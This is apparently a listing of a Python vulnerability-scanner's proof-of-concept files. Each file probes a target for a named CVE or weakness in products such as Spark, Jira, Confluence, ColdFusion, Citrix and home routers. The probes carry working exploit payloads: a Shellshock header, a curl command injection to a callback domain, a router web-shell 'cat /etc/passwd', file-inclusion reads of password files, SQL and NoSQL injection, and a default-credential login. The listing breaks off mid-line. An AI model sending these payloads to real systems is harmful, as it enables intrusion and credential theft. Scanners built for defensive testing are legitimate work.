    form = "username=guacadmin&password=guacadmin"
    hdrs = {'Content-Type': 'application/x-www-form-urlencoded'}
    reply = requests.post(target, form, headers=hdrs, timeout=5, verify=False)
    page = reply.text
    return reply.status_code == 200 and '"userID":"guacadmin"' in page and '"authToken"' in page
21 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-apache-spark-rce-cve-2022-33891.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3,time
2 | import sys,os
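# Make the "reverse" helper directory importable for the two imports below.
# os.path.join replaces the hard-coded Windows separator: on POSIX hosts
# cwd + '\\reverse' names a directory that does not exist, so the imports fail.
# NOTE(review): the search path is derived from the current working directory,
# so whichever directory the tool is started from decides which
# getdomain/getresult modules are loaded -- start it from the project root only.
cwd = os.getcwd()
sys.path.append(os.path.join(cwd, 'reverse'))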
5 | from getdomain import get_domain
6 | from getresult import get_result
7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """Out-of-band check for CVE-2022-33891 (identifier from the file name).

    get_domain() supplies a (domain, token) pair; the domain is embedded in
    the doAs query parameter, and after a two-second wait the truthiness of
    get_result(domain, token) is returned as a bool (presumably "was a
    callback recorded").  Exceptions raised by requests propagate.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    callback = get_domain()
    domain, token = callback[0], callback[1]
    target = baseurl + "?doAs=`curl%20http://" + domain + "`"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    # The HTTP reply is not inspected; only the callback lookup decides the result.
    requests.get(target, headers=ua, timeout=5, verify=False)
    time.sleep(2)  # give a delayed callback time to arrive before asking
    return bool(get_result(domain, token))
28 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-apache-storm-unauthorized-access.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """Check whether api/v1/cluster/summary answers without authentication.

    Returns True when the reply is HTTP 200 and contains both the
    {"totalMem": and "stormVersion": fragments.  Exceptions raised by
    requests propagate.
    """
    if baseurl[-1] != '/':
        baseurl += "/"
    target = baseurl + "api/v1/cluster/summary"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    page = reply.text
    return reply.status_code == 200 and '{"totalMem":' in page and '"stormVersion":' in page
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-atlassian-jira-cve-2019-3401.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """Request the popular-filters view of ManageFilters.jspa (CVE-2019-3401 per the file name).

    Returns True when the reply is HTTP 200 and the pattern below matches.
    Exceptions raised by requests propagate.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    target = baseurl + "secure/ManageFilters.jspa?filter=popular&filterView=popular"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    # NOTE(review): the pattern is empty and matches every body, so the
    # result depends on the status code alone; the original pattern appears
    # to be missing from this listing.  Any HTTP 200 (including a login page
    # served with 200) is reported as a hit -- confirm findings manually.
    return reply.status_code == 200 and re.search("", reply.text) is not None
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-atlassian-jira-cve-2022-0540.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """Check InsightPluginShowGeneralConfiguration.jspa; (CVE-2022-0540 per the file name).

    Requests the action with a trailing ';' and returns True when the reply
    is HTTP 200 and contains 'General Insight Configuration'.
    Exceptions raised by requests propagate.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    target = baseurl + "InsightPluginShowGeneralConfiguration.jspa;"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    return reply.status_code == 200 and "General Insight Configuration" in reply.text
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-bash-cve-2014-6271.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
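def randomInt(s, e):
    """Return a random integer N with int(s) <= N <= int(e)."""
    import random
    return random.randint(int(s), int(e))


# Two operands for the arithmetic canary that scan() looks for; both are
# drawn once at import time.  The helper used to be defined twice with
# identical bodies -- a single definition serves both values.
r1 = randomInt(800000000, 1000000000)
r2 = randomInt(800000000, 1000000000)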
def scan(baseurl):
    """Check cgi-bin/victim.cgi for CVE-2014-6271 (identifier from the file name).

    The User-Agent header carries a function definition followed by an
    'expr r1 + r2' command; True is returned when the sum of the two
    module-level values appears in the reply body.  The status code is not
    checked.  Exceptions raised by requests propagate.
    """
    if baseurl[-1] != '/':
        baseurl += "/"
    target = baseurl + "cgi-bin/victim.cgi"
    agent = {'User-Agent': "() { :; }; echo; echo; /bin/bash -c \'expr "+str(r1)+" + "+str(r2)+"\'"}
    reply = requests.get(target, headers=agent, timeout=5, verify=False)
    expected = str(r1 + r2)
    return expected in reply.text
29 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-bt742-pma-unauthorized-access.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """Check whether the pma/ path is reachable without authentication.

    Returns True when the reply is HTTP 200 and contains
    'information_schema', 'phpMyAdmin' and 'server_sql.php'.
    Exceptions raised by requests propagate.
    """
    if baseurl[-1] != '/':
        baseurl += "/"
    target = baseurl + "pma/"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    page = reply.text
    return (
        reply.status_code == 200
        and "information_schema" in page
        and "phpMyAdmin" in page
        and "server_sql.php" in page
    )
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-cerebro-request-ssrf.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """SSRF check against rest/request.

    Posts a JSON request that names https://www.baidu.com as host and
    robots.txt as path, and returns True only when all five conditions
    below hold for the single reply.  Each probe makes the target contact
    that third-party site.  Exceptions raised by requests propagate.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    target = baseurl + "rest/request"
    payload = '{"method":"GET","data":"","path":"robots.txt","host":"https://www.baidu.com"}'
    hdrs = {'content-type': 'application/json'}
    reply = requests.post(target, payload, headers=hdrs, timeout=5, verify=False)
    page = reply.text
    # NOTE(review): HTTP 200 is required together with a body that reports
    # '{"status":500' and 'Unrecognized token'.  This looks like two separate
    # checks joined with "and"; if they were meant for different replies the
    # test may never succeed -- verify against the upstream rule.
    return (
        "Disallow" in page
        and "baidu" in page
        and reply.status_code == 200
        and "Unrecognized token" in page
        and '{"status":500' in page
    )
21 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-changjie-crm-sqli.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | from hashlib import md5
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def randomInt(s, e):
    """Return a random integer N with int(s) <= N <= int(e)."""
    import random
    bounds = (int(s), int(e))
    return random.randint(*bounds)


# Canary value, drawn once at import time and reused by every scan() call.
a1 = randomInt(200, 900)
def scan(baseurl):
    """SQL-injection check against webservice/get_usedspace.php.

    The request asks the database to compute md5() of the module-level
    canary `a1`; True is returned when the locally computed digest appears
    in the reply body.  The status code is not checked.
    Exceptions raised by requests propagate.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    target = baseurl + "webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20md5(" + str(a1) + ")--"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    return md5(str(a1).encode()).hexdigest() in reply.text
25 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-china-mobile-yu-router-information-disclosure.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """Check whether cgi-bin/ExportSettings.sh returns the device configuration.

    Returns True when the reply is HTTP 200 and all three patterns below
    match; a hit means the exported settings, including the wan_pptp_user
    and wan_pptp_pass entries, are readable without logging in.
    Exceptions raised by requests propagate.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    target = baseurl + "cgi-bin/ExportSettings.sh"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    if reply.status_code != 200:
        return False
    # The patterns are regular expressions; the '.' in the first one matches
    # any character, not only a literal full stop.
    markers = ("#The following line must not be removed.", "wan_pptp_user", "wan_pptp_pass")
    return all(re.search(pattern, reply.text) for pattern in markers)
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-china-telecom-zte-f460-rce.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """Check whether web_shell_cmd.gch accepts commands without authentication.

    Posts the form below and returns True when the reply is HTTP 200 and
    matches 'root:.*:0'.  Exceptions raised by requests propagate.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    target = baseurl + "web_shell_cmd.gch"
    form = "IF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=cat+%2Fetc%2Fpasswd&CmdAck="
    hdrs = {'Content-Type': 'application/x-www-form-urlencoded'}
    reply = requests.post(target, form, headers=hdrs, timeout=5, verify=False)
    # NOTE(review): 'root:.*:0' is looser than the 'root:[x*]:0:0:' pattern
    # used by the other file-read checks; any line with 'root:' followed
    # later by ':0' matches.
    return reply.status_code == 200 and re.search("root:.*:0", reply.text) is not None
21 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-citrix-cve-2019-19781-path-traversal.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """Path-traversal check for CVE-2019-19781 (identifier from the file name).

    Requests vpn/.%2e/vpns/cfg/smb.conf and returns True when the reply is
    HTTP 200 and contains 'encrypt passwords' and 'name resolve order'.
    Exceptions raised by requests propagate.
    """
    if baseurl[-1] != '/':
        baseurl += "/"
    target = baseurl + "vpn/.%2e/vpns/cfg/smb.conf"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    page = reply.text
    return reply.status_code == 200 and "encrypt passwords" in page and "name resolve order" in page
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-clickhouse-http-unauth.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | from hashlib import md5
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def randomInt(s, e):
    """Return a random integer N with int(s) <= N <= int(e)."""
    import random
    start = int(s)
    stop = int(e)
    return random.randint(start, stop)


# Canary value, drawn once at import time and reused by every scan() call.
r = randomInt(800000000, 1000000000)
def scan(baseurl):
    """Check whether the HTTP query interface runs queries without authentication.

    Sends a query that hashes the module-level canary `r` and returns True
    when the reply is HTTP 200 and contains the locally computed lowercase
    hex MD5 digest.  Exceptions raised by requests propagate.
    """
    if baseurl[-1] != '/':
        baseurl += "/"
    target = baseurl + f"?query=select%20lower(hex(MD5('{r}')))"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    expected = md5(str(r).encode()).hexdigest()
    return reply.status_code == 200 and expected in reply.text
25 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-cmseasy-sqli.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """SQL-execution check against the crossall/execsql action.

    Sends the fixed 'sql' parameter below and returns True when the reply is
    HTTP 200 and contains the expected md5(31415926) JSON pair.
    Exceptions raised by requests propagate.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    target = baseurl + "?case=crossall&act=execsql&sql=Nd2asYGSjJK2jNTg4MSA28UozMil7"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    marker = '{"md5(31415926)":"e9982ec5ca981bd365603623cf4b2277"}'
    return reply.status_code == 200 and marker in reply.text
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-cockpit-cve-2020-35847-nosqli.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """NoSQL-injection check against auth/resetpassword (CVE-2020-35847 per the file name).

    Posts a JSON body whose 'token' is an object with a '$func' key and
    returns True when the reply is HTTP 200 and contains a dumped string
    that starts with 'rp-'.  Exceptions raised by requests propagate.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    target = baseurl + "auth/resetpassword"
    payload = '''{
"token":{
"$func":"var_dump"
}
}'''
    hdrs = {'Content-Type': 'application/json'}
    reply = requests.post(target, payload, headers=hdrs, timeout=5, verify=False)
    dumped = re.search(r'string[(]\d+[)] "rp-(.*?)"', reply.text) if reply.status_code == 200 else None
    return dumped is not None
25 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-coldfusion-cve-2010-2861-lfi.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
# The probe in scan() is sent with verify=False, which makes urllib3 emit an
# InsecureRequestWarning; that single warning category is silenced here.
# The filter applies to the whole process, not only to this module.
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)
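def scan(baseurl):
    """Check a ColdFusion server for CVE-2010-2861 (local file inclusion).

    One GET is sent to ``CFIDE/administrator/enter.cfm`` with a ``locale``
    value that walks up the directory tree to ``lib/password.properties``.
    The target is reported as affected when the reply is HTTP 200 and
    contains both ``rdspassword=`` and ``encrypted=``, i.e. the properties
    file was returned in the page.

    Only a boolean is returned. A positive response body holds the contents
    of the password file, so it should stay out of logs if this check is
    extended.

    Args:
        baseurl: Root URL of the server, with or without a trailing slash.

    Returns:
        True if both markers are present in a 200 response, otherwise
        False. An empty ``baseurl`` yields False without any request being
        made.

    Raises:
        requests.exceptions.RequestException: connection, timeout and URL
            errors are not caught here and reach the caller.
    """
    # Indexing baseurl[-1] raised IndexError on an empty target; treat an
    # empty target as "not affected" instead.
    if not baseurl:
        return False
    if not baseurl.endswith('/'):
        baseurl = baseurl + "/"

    url = baseurl + "CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}

    # verify=False skips TLS certificate validation, so the peer is not
    # authenticated; the result is an indicator to confirm, not proof.
    response = requests.get(url, headers=headers, timeout=5, verify=False)

    if response.status_code != 200:
        return False
    page = response.text
    return all(marker in page for marker in ("rdspassword=", "encrypted="))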
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-confluence-cve-2015-8399.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
# The probe in scan() is sent with verify=False, which makes urllib3 emit an
# InsecureRequestWarning; that single warning category is silenced here.
# The filter applies to the whole process, not only to this module.
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)
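def scan(baseurl):
    """Check a Confluence server for CVE-2015-8399.

    One GET is sent to ``spaces/viewdefaultdecorator.action`` with an empty
    ``decoratorName`` parameter and no credentials. The target is reported
    as affected when the reply is HTTP 200 and contains both
    ``confluence-init.properties`` and ``View Default Decorator``, i.e. the
    decorator viewer answered the request and its page names that
    configuration file.

    Args:
        baseurl: Root URL of the Confluence instance, with or without a
            trailing slash.

    Returns:
        True if both markers are present in a 200 response, otherwise
        False. An empty ``baseurl`` yields False without any request being
        made.

    Raises:
        requests.exceptions.RequestException: connection, timeout and URL
            errors are not caught here and reach the caller.
    """
    # Indexing baseurl[-1] raised IndexError on an empty target; treat an
    # empty target as "not affected" instead.
    if not baseurl:
        return False
    if not baseurl.endswith('/'):
        baseurl = baseurl + "/"

    url = baseurl + "spaces/viewdefaultdecorator.action?decoratorName"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}

    # verify=False skips TLS certificate validation, so the peer is not
    # authenticated; the result is an indicator to confirm, not proof.
    response = requests.get(url, headers=headers, timeout=5, verify=False)

    if response.status_code != 200:
        return False
    page = response.text
    return "confluence-init.properties" in page and "View Default Decorator" in page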
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-confluence-cve-2019-3396-lfi.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
# The probe in scan() is sent with verify=False, which makes urllib3 emit an
# InsecureRequestWarning; that single warning category is silenced here.
# The filter applies to the whole process, not only to this module.
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)
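def scan(baseurl):
    """Check a Confluence server for CVE-2019-3396 (local file inclusion).

    One POST is sent to ``rest/tinymce/1/macro/preview`` asking for a
    preview of the ``widget`` macro with ``_template`` set to
    ``../web.xml``. The target is reported as affected when the reply is
    HTTP 200 and contains ``contextConfigLocation``, i.e. the deployment
    descriptor was rendered into the preview.

    The ``contentId`` in the request body is a fixed value. Whether the
    result depends on that id existing on the target is not visible from
    this file, so a False result may need a second look.

    Args:
        baseurl: Root URL of the Confluence instance, with or without a
            trailing slash.

    Returns:
        True if the marker is present in a 200 response, otherwise False.
        An empty ``baseurl`` yields False without any request being made.

    Raises:
        requests.exceptions.RequestException: connection, timeout and URL
            errors are not caught here and reach the caller.
    """
    # Indexing baseurl[-1] raised IndexError on an empty target; treat an
    # empty target as "not affected" instead.
    if not baseurl:
        return False
    if not baseurl.endswith('/'):
        baseurl = baseurl + "/"

    url = baseurl + "rest/tinymce/1/macro/preview"
    body = '{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"}}}'
    headers = {'Content-Type': 'application/json', 'Referer': 'http://localhost'}

    # verify=False skips TLS certificate validation, so the peer is not
    # authenticated; the result is an indicator to confirm, not proof.
    response = requests.post(url, body, headers=headers, timeout=5, verify=False)

    return response.status_code == 200 and "contextConfigLocation" in response.text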
21 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-coremail-cnvd-2019-16798.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
# The probe in scan() is sent with verify=False, which makes urllib3 emit an
# InsecureRequestWarning; that single warning category is silenced here.
# The filter applies to the whole process, not only to this module.
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=='/':
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"mailsms/s?func=ADMIN:appState&dumpConfig=/"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and "